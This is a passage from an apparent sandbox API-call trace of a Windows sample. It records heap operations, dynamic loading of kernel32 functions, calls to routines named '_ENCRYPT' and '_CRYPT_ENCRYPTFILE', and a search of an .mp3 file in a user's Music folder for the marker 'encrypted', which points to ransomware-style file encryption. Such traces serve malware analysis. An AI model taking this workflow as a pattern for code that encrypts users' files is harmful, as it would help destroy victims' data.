hHeap=0x770000) returned 1 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.578] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.579] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0037.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cf10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.579] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.579] CloseHandle (hObject=0x128) returned 1 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.580] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.580] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.581] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.581] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.581] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.581] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.581] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.581] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.581] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.581] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0xe4915d20, ftLastWriteTime.dwHighDateTime=0x1d5c1b9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 0x7c20c0 [0037.581] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.581] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0xe4915d20, ftLastWriteTime.dwHighDateTime=0x1d5c1b9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 0x7c20c0 [0037.581] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.582] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="68KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ILlni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Llni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="65ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ojNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SJoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZHlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HlTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lTi0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ti0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VKh7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.584] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.584] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.584] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.584] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.584] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.584] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, 